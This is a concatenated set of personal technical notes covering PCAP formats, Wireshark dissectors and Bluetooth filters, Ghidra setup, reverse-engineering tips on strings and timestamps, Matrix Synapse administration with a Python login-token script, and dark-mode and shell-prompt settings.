-------------------------------------------------------------------------------- 1 | References 2 | - [https://wiki.wireshark.org/Development/LibpcapFileFormat](https://wiki.wireshark.org/Development/LibpcapFileFormat) PCAP Format 3 | - [https://gitlab.com/wireshark/wireshark/-/wikis/Development/LibpcapFileFormat](https://gitlab.com/wireshark/wireshark/-/wikis/Development/LibpcapFileFormat) Newer docs on PCAP format 4 | - [https://pcapng.github.io/pcapng/draft-tuexen-opsawg-pcapng.html](https://pcapng.github.io/pcapng/draft-tuexen-opsawg-pcapng.html) PCAPNG Format 5 | 6 | Basic layout of a PCAP file 7 | 8 | ![image](https://user-images.githubusercontent.com/26436276/199809307-d618cf6d-1abe-4417-947b-d7f17af81a76.png) 9 | 10 | A pcapng file. Basically everything is a "block" and there's all this extra metadata 11 | 12 | ![image](https://user-images.githubusercontent.com/26436276/199809420-9dfd8fbe-590b-4d1e-aa1e-30d48a642b0c.png) 13 | -------------------------------------------------------------------------------- /protocols/wiresharktips.md: -------------------------------------------------------------------------------- 1 | # Wireshark Tips 2 | 3 | [https://gitlab.com/wireshark/wireshark/-/wikis/home](https://gitlab.com/wireshark/wireshark/-/wikis/home) The wireshark wiki 4 | 5 | Additional oneliners here: https://github.com/netspooky/notes/blob/main/linux/oneliners.md#tshark-and-wireshark 6 | 7 | ## Install wireshark from source 8 | This is how you do it on Linux at least 9 | ``` 10 | git clone https://gitlab.com/wireshark/wireshark.git 11 | cd wireshark 12 | sudo ./tools/debian-setup.sh 13 | mkdir build 14 | cd build 15 | cmake .. 16 | make 17 | ``` 18 | Now you can run with: 19 | ``` 20 | run/wireshark 21 | ``` 22 | 23 | ## Dissector stuff 24 | 25 | [https://mika-s.github.io/wireshark/lua/dissector/2017/11/04/creating-a-wireshark-dissector-in-lua-1.html](https://mika-s.github.io/wireshark/lua/dissector/2017/11/04/creating-a-wireshark-dissector-in-lua-1.html) 26 | 27 | [https://www.wireshark.org/docs/wsdg_html_chunked/wslua_tap_example.html](https://www.wireshark.org/docs/wsdg_html_chunked/wslua_tap_example.html) 28 | 29 | This is really useful for reference 30 | 31 | [11.6. Functions For New Protocols And Dissectors](https://www.wireshark.org/docs/wsdg_html_chunked/lua_module_Proto.html) 32 | 33 | ### Calling another dissector 34 | 35 | [https://www.wireshark.org/docs/wsdg_html_chunked/lua_module_Proto.html](https://www.wireshark.org/docs/wsdg_html_chunked/lua_module_Proto.html) 36 | 37 | The `buf(offset):tvb()` arg is important. offset is where in the previous buffer to start, and :tvb() casts it from userdata to a tvb 38 | 39 | ```lua 40 | function proto_lap5.dissector(buf, pinfo, tree) 41 | if buf:len() > HEADER_LEN then 42 | -- create a new buffer containing only the XLES data, 43 | -- and pass it to the XLES dissector 44 | Dissector.get("xles"):call(buf(HEADER_LEN):tvb(), pinfo, tree) 45 | end 46 | end 47 | ``` 48 | 49 | ### Dealing with UTF16 strings 50 | 51 | this is actually a really sick way to do this...it goes by the null terminated string... 52 | 53 | ```lua 54 | msg_f = ProtoField.string("mydissector.msg", "msg") 55 | local getMsg = buffer(13) -- starting on byte 13 56 | local msg = getMsg:le_ustring() 57 | subtree:add(msg_f, getMsg, msg) 58 | ``` 59 | 60 | # Capturing Bluetooth with Wireshark 61 | Tested on Ubuntu 22.04 62 | - Enable Bluetooth in settings 63 | - Use the bluetooth-monitor interface 64 | - Use this filter to get advertising reports `bthci_evt.le_meta_subevent == 0x02` 65 | - Filter for one device `btcommon.eir_ad.entry.device_name == "My Device"` 66 | - Filter on MAC addrs `bthci_evt.bd_addr == 55:55:55:55:55:55` 67 | - See messages with manufacturer data `btcommon.eir_ad.entry.data` 68 | -------------------------------------------------------------------------------- /re/ghidra_setup.md: -------------------------------------------------------------------------------- 1 | # Linux Ghidra Setup 2 | Updated 2023-02-01 3 | 4 | This worked on Ubuntu 22.04 with Ghidra 10.2.2. It requires Java 17+ 5 | 6 | ``` 7 | sudo apt update 8 | sudo apt install openjdk-17-jdk 9 | sudo apt install openjdk-17-jre 10 | java -version # Confirm it's installed 11 | # Download latest from https://github.com/NationalSecurityAgency/ghidra/releases 12 | wget https://github.com/NationalSecurityAgency/ghidra/releases/download/Ghidra_10.2.2_build/ghidra_10.2.2_PUBLIC_20221115.zip 13 | 7z x ghidra_10.2.2_PUBLIC_20221115.zip 14 | cd ghidra_10.2.2_PUBLIC_20221115/ 15 | ./ghidraRun 16 | ``` 17 | -------------------------------------------------------------------------------- /re/string_representation.md: -------------------------------------------------------------------------------- 1 | # RE Tips: Common String Representations 2 | 3 | _Originally posted 2022-05-09_ 4 | 5 | Strings are a good way of determining the layout of an unknown binary blob. If you can figure out how the strings are stored, you can use it as an anchor to map out other structures around them. 6 | 7 | ![image](https://user-images.githubusercontent.com/26436276/209995327-7e24d760-de7a-41c0-8ab3-28fdc5dfcb7c.png) 8 | 9 | Image Description: 10 | 11 | A text file explaining the common string representations. 12 | 13 | - Length First, where the length of the string is stored before the string. 14 | - Null Terminated, where each string ends in a null byte. 15 | - Fixed Width, where each field is a fixed size. These can also have padding if they need to be aligned to a certain amount of bytes, AKA they must be divisible by a certain number. 16 | -------------------------------------------------------------------------------- /re/timestamps.md: -------------------------------------------------------------------------------- 1 | # RE Tips: Timestamps 2 | 3 | _Originally Posted: 2021-09-10_ 4 | 5 | If you're analyzing an unknown protocol or binary format, know your time stamps! 6 | 7 | Let's say you know the pcap (or file) was created in the last 24 hours. 8 | 9 | Right now it's 1631293496 in Unix time. 10 | - In hex: 613B9038 11 | - In ASCII: "a;\x908" 12 | 13 | https://unixtimestamp.com 14 | 15 | If we go back exactly 24 hrs, the time is 1631221496. 16 | - In hex: 613A76F8 17 | - In ASCII: "a:v\xF8" 18 | 19 | Now you can look in the hex dump for "a" and either ":" or ";" beside it. If you don't know the endianness, this can be a good way to figure that out. Can also align fields around it. 20 | 21 | Not all protocols or file formats will have timestamps included, but it's common enough that it's a good thing to search for, especially if there are few strings. 22 | 23 | There are lots of other timestamp formats that are helpful to know. Familiarize yourself for gr8 victory. 24 | 25 | Example: Given this, if found a timestamp, you can probably assume that there's _some_ of boundary at 0xC1. It's lil endian, and now you can trace other values. 26 | 27 | - Is 0xA5 a virtual address? 28 | - Is 0xB9 a boolean? 29 | - Is 0xCB a bit pattern? 30 | 31 | These are the questions you wanna ask. 32 | 33 | ![highlighted hex dump that is described by the writeup](https://user-images.githubusercontent.com/26436276/209995891-483dc310-bce2-41fa-b7dc-893b4a31149e.png) 34 | -------------------------------------------------------------------------------- /sysadmin/matrix_synapse.md: -------------------------------------------------------------------------------- 1 | These are tips and tricks for [Matrix Synapse](https://github.com/matrix-org/synapse/). Assuming that all of this is being done on your server directly. 2 | 3 | ## Add a new user 4 | ``` 5 | register_new_matrix_user -c /etc/matrix-synapse/homeserver.yaml http://localhost:8008 6 | ``` 7 | ## Change a user's password. 8 | 9 | You have to create a password hash using `hash_password` and your homeserver file so that it does the type of hashing you want. 10 | ``` 11 | hash_password -c /etc/matrix-synapse/homeserver.yaml 12 | ``` 13 | Then switch to the postgres user and update the user with the new hash you just made. 14 | ``` 15 | sudo su 16 | su postgres 17 | psql 18 | \c synapse 19 | UPDATE users SET password_hash='NEWHASH' WHERE name='@user:your.host'; 20 | \q 21 | ``` 22 | ## Clear media cache 23 | Use the [admin API](https://matrix-org.github.io/synapse/latest/admin_api/media_admin_api.html) for this. You can call this API from localhost on your machine. 24 | 25 | You will also need an admin user and the auth token for this user. You can grab this from the client supposedly, but I just use the matrix_tokenstore.py script in this folder to log in and create a new session just for this. 26 | 27 | First, grab a timestamp that you want to clear from. Syanpse expects a unix timestamp with millisecond precision. 28 | ``` 29 | date --date='1 year ago' +%s%3N 30 | ``` 31 | Let's say that this timestamp is `1635382166398`, you will put this at the end of your request after the `before_ts=` part of the URL 32 | ``` 33 | curl --header "Authorization: Bearer YOURTOKEN" -X POST http://localhost:8008/_synapse/admin/v1/purge_media_cache?before_ts=1635382166398 34 | ``` 35 | Run that and you should be good. If there is an error it will indicate to you in the json from the server. 36 | 37 | ## Fixing libolm error in python 38 | 39 | I have some bots and services which use libolm via the [matrix-nio](https://github.com/poljar/matrix-nio) library. Sometimes during an update this shared object is overwritten, so fix it like so: 40 | 41 | ``` 42 | sudo ln -sf /usr/local/lib/libolm.so /usr/lib/x86_64-linux-gnu/libolm.so.2 43 | ``` 44 | -------------------------------------------------------------------------------- /sysadmin/matrix_tokenstore.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | import asyncio 3 | import json 4 | import os 5 | import sys 6 | import getpass 7 | # https://github.com/poljar/matrix-nio This is where nio is from 8 | from nio import AsyncClient, LoginResponse 9 | 10 | CONFIG_FILE = "credentials.json" 11 | 12 | # Check out main() below to see how it's done. 13 | 14 | def write_details_to_disk(resp: LoginResponse, homeserver) -> None: 15 | """Writes the required login details to disk so we can log in later without 16 | using a password. 17 | Arguments: 18 | resp {LoginResponse} -- the successful client login response. 19 | homeserver -- URL of homeserver, e.g. "https://matrix.example.org" 20 | """ 21 | # open the config file in write-mode 22 | with open(CONFIG_FILE, "w") as f: 23 | # write the login details to disk 24 | json.dump( 25 | { 26 | "homeserver": homeserver, # e.g. "https://matrix.example.org" 27 | "user_id": resp.user_id, # e.g. "@user:example.org" 28 | "device_id": resp.device_id, # device ID, 10 uppercase letters 29 | "access_token": resp.access_token # cryptogr. access token 30 | }, 31 | f 32 | ) 33 | 34 | async def main() -> None: 35 | # If there are no previously-saved credentials, we'll use the password 36 | if not os.path.exists(CONFIG_FILE): 37 | print("First time use. Did not find credential file. Asking for " 38 | "homeserver, user, and password to create credential file.") 39 | homeserver = "https://matrix.example.org" 40 | homeserver = input(f"Enter your homeserver URL: [{homeserver}] ") 41 | 42 | if not (homeserver.startswith("https://") 43 | or homeserver.startswith("http://")): 44 | homeserver = "https://" + homeserver 45 | 46 | user_id = "@user:example.org" 47 | user_id = input(f"Enter your full user ID: [{user_id}] ") 48 | 49 | device_name = "matrix-nio" 50 | device_name = input(f"Choose a name for this device: [{device_name}] ") 51 | 52 | client = AsyncClient(homeserver, user_id) 53 | pw = getpass.getpass() 54 | 55 | resp = await client.login(pw, device_name=device_name) 56 | 57 | # check that we logged in succesfully 58 | if (isinstance(resp, LoginResponse)): 59 | write_details_to_disk(resp, homeserver) 60 | else: 61 | print(f"homeserver = \"{homeserver}\"; user = \"{user_id}\"") 62 | print(f"Failed to log in: {resp}") 63 | sys.exit(1) 64 | 65 | print( 66 | "Logged in using a password. Credentials were stored.", 67 | "Try running the script again to login with credentials." 68 | ) 69 | 70 | # Otherwise the config file exists, so we'll use the stored credentials 71 | else: 72 | # open the file in read-only mode 73 | with open(CONFIG_FILE, "r") as f: 74 | config = json.load(f) 75 | client = AsyncClient(config['homeserver']) 76 | 77 | client.access_token = config['access_token'] 78 | client.user_id = config['user_id'] 79 | client.device_id = config['device_id'] 80 | 81 | # Now we can send messages as the user 82 | room_id = "!myfavouriteroomid:example.org" 83 | room_id = input(f"Enter room id for test message: [{room_id}] ") 84 | 85 | await client.room_send( 86 | room_id, 87 | message_type="m.room.message", 88 | content={ 89 | "msgtype": "m.text", 90 | "body": "I'M GETTING BENT LIKE A PARABOLA" 91 | } 92 | ) 93 | print("Logged in using stored credentials. Sent a test message.") 94 | 95 | # Either way we're logged in here, too 96 | await client.close() 97 | 98 | asyncio.get_event_loop().run_until_complete(main()) 99 | -------------------------------------------------------------------------------- /themes/darkmode.md: -------------------------------------------------------------------------------- 1 | Here are various ways of doing darkmode on different things. 2 | 3 | Dark Mode in Windows 10, use regedit to change this key. Works without needing to activate Windows. 4 | ``` 5 | HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Themes\\Personalize\\AppsUseLightTheme = 0 6 | ``` 7 | 8 | Bootleg QT dark mode on Wireshark >= 3.4.4 on Windows. 9 | ``` 10 | "C:\\Program Files\\Wireshark\\Wireshark.exe" -platform windows:darkmode=2 11 | ``` 12 | 13 | Ghidra Dark mode! [https://github.com/zackelia/ghidra-dark](https://github.com/zackelia/ghidra-dark) 14 | - TIP: Just download flatlaf JAR file from line 40 in install.py and put it in the Ghidra install folder (wherever ghidraRun is). 15 | - I installed like `python3 install.py -p "C:\Users\user\Documents\Tools\ghidra_10.0.4_PUBLIC_20210928\ghidra_10.0.4_PUBLIC"` 16 | -------------------------------------------------------------------------------- /themes/prompts.md: -------------------------------------------------------------------------------- 1 | 1. This is my minimal PS1 for Bash 2 | ``` 3 | PS1="\\[\\e]0;\\u@\\h: \\w\\a\\]\\[\\e[38;5;123m\\]\\t\\[\\e[0m\\] \\[\\e[38;5;219m\\]\\w \\[\\e[0m\\]\\n▶ " 4 | ``` 5 | 6 | 2. This is the more full PS1 with time and the directory. 7 | ``` 8 | PS1="\\[\\e[38;5;141m\\][\\[\\e[m\\]\\[\\e[38;5;219m\\]\\u\\[\\e[m\\]\\[\\e[38;5;226m\\]@\\[\\e[m\\]\\[\\e[38;5;86m\\]\\h\\[\\e[m\\]\\[\\e[38;5;141m\\]]-[\\[\\e[m\\]\\[\\e[38;5;159m\\]\\t\\[\\e[m\\]\\[\\e[38;5;141m\\]]-[\\[\\e[m\\]\\[\\e[38;5;226m\\]\\w\\[\\e[m\\]\\[\\e[38;5;141m\\]]\\[\\e[m\\]\\n\\\\$ \\[$(tput sgr0)\\]" 9 | ``` 10 | 11 | 3. A ZSH prompt that looks similar to 2 12 | ``` 13 | PROMPT="%{$reset_color%}%{$fg[cyan]%}%D{%Y-%m-%d %I:%M:%S}%b%{$reset_color%} %{$fg[magenta]%}%~%{$reset_color%} 14 | $fg[yellow]%}~%{$reset_color%}" 15 | ``` 16 | --------------------------------------------------------------------------------